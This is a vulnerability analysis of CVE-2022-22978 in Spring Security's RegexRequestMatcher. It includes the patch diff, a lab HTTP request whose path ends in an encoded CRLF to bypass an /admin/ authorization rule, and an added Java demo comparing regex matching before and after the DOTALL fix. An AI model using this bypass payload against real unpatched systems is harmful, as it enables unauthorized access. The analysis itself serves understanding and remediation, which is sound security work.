CVE-2022-22978 Vulnerability Analysis
CVE-2022-22978
In Spring Security versions 5.5.6 and 5.5.7 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.
Environment Setup
VulEnv/springboot/cve_2022_22978 at master · XuCcc/VulEnv
Source Code Analysis
According to the vulnerability description, a regular expression containing `.` used with RegexRequestMatcher can be bypassed. Looking at the commits of the GitHub version upgrade [^1], in AntRegexRequestMatcher Optimization · spring-projects/spring-security@7086395 we can see that a Pattern.DOTALL flag was added when the regex is compiled:
public final class RegexRequestMatcher implements RequestMatcher {
private static final int DEFAULT = Pattern.DOTALL;
private static final int CASE_INSENSITIVE = DEFAULT | Pattern.CASE_INSENSITIVE;
private static final Log logger = LogFactory.getLog(RegexRequestMatcher.class);
@@ -68,7 +70,7 @@ public RegexRequestMatcher(String pattern, String httpMethod) {
* {@link Pattern#CASE_INSENSITIVE} flag set.
*/
public RegexRequestMatcher(String pattern, String httpMethod, boolean caseInsensitive) {
this.pattern = Pattern.compile(pattern, caseInsensitive ? CASE_INSENSITIVE : DEFAULT);
this.httpMethod = StringUtils.hasText(httpMethod) ? HttpMethod.valueOf(httpMethod) : null;
}
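Review bot: the Javadoc above the three-argument constructor (the line ending `{@link Pattern#CASE_INSENSITIVE} flag set.`) still documents only the case-insensitive flag, yet `DEFAULT` now carries `Pattern.DOTALL` unconditionally, so every pattern compiled by this class changes behaviour (`.` now matches line terminators). The constructor documentation should say so explicitly, since existing callers may have relied on `.` stopping at a newline.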
Pattern.DOTALL makes `.` match line terminators; by default `.` does not match a newline [^2]. From this it is safe to conclude that the bypass works through a newline character.
In org.springframework.security.web.util.matcher.RegexRequestMatcher#matches the compiled pattern is matched against the URL. If the regex matches, the current URL is handled by this rule; otherwise the request is let through directly.
Writing the Exploit
GET /admin/1 HTTP/1.1
Host: 127.0.0.1:9999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=E8E29D0409C6C153D1C825E11A344082
Connection: close
HTTP/1.1 302
Set-Cookie: JSESSIONID=ED152B696DF48DA74FB14185AE3E5ED8; Path=/; HttpOnly
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Location: http://127.0.0.1:9999/login
Content-Length: 0
Date: Fri, 27 May 2022 03:49:22 GMT
Connection: close
Injecting any newline character into the path bypasses the authorization check for `admin/.*`:
GET /admin/1%0d%0a HTTP/1.1
Host: 127.0.0.1:9999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=E8E29D0409C6C153D1C825E11A344082
Connection: close
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 11
Date: Fri, 27 May 2022 03:47:59 GMT
Connection: close
welcome 1
Patch
Fixed by adding Pattern.DOTALL so that the pattern also matches newline characters.
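The following is an added example, not code from the original post or from Spring Security. It reproduces the matching logic described in the source analysis and in the patch above with plain java.util.regex, so that the difference between the pre-fix compile (no flags) and the post-fix compile (Pattern.DOTALL) can be checked locally. The rule string `/admin/.*` and the sample paths (one carrying the decoded `%0d%0a`) are constructed for this demonstration; the class and method names are assumptions.

```java
import java.util.regex.Pattern;

/**
 * Added example, not part of the original post or of Spring Security.
 * Reproduces RegexRequestMatcher#matches behaviour before and after the
 * CVE-2022-22978 fix using java.util.regex directly.
 */
public class DotAllDemo {

    // Constructed authorization rule: everything under /admin/ needs auth.
    static final String ADMIN_RULE = "/admin/.*";

    /** Pre-fix behaviour: pattern compiled with no flags, '.' stops at a line terminator. */
    static boolean matchesBeforeFix(String regex, String path) {
        return Pattern.compile(regex).matcher(path).matches();
    }

    /** Post-fix behaviour: Pattern.DOTALL is always set, '.' also matches \r and \n. */
    static boolean matchesAfterFix(String regex, String path) {
        return Pattern.compile(regex, Pattern.DOTALL).matcher(path).matches();
    }

    public static void main(String[] args) {
        // Constructed sample paths: a normal request, and two that carry a
        // line terminator (the decoded form of %0d%0a / %0a in the path).
        String[] paths = { "/admin/1", "/admin/1\r\n", "/admin/1\n" };

        for (String path : paths) {
            // Make the control characters visible in the output.
            String shown = path.replace("\r", "\\r").replace("\n", "\\n");
            System.out.printf("%-14s before fix: %-5s after fix: %s%n",
                    shown,
                    matchesBeforeFix(ADMIN_RULE, path),
                    matchesAfterFix(ADMIN_RULE, path));
        }
        // When matchesBeforeFix returns false for a path under /admin/, the
        // RegexRequestMatcher rule does not apply and the request is let
        // through, which is exactly the bypass analysed above.
    }
}
```

Run it with `javac DotAllDemo.java && java DotAllDemo`. Because Matcher#matches requires the whole input to match and `.` without DOTALL refuses to consume `\r` or `\n`, the two paths ending in a line terminator fall outside the rule before the fix; with DOTALL they are matched like any other `/admin/` path.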
Reference

[^1]: https://github.com/spring-projects/spring-security/compare/5.6.3...5.6.4
[^2]: https://docs.oracle.com/javase/7/docs/api/java/util/regex/Pattern.html#DOTALL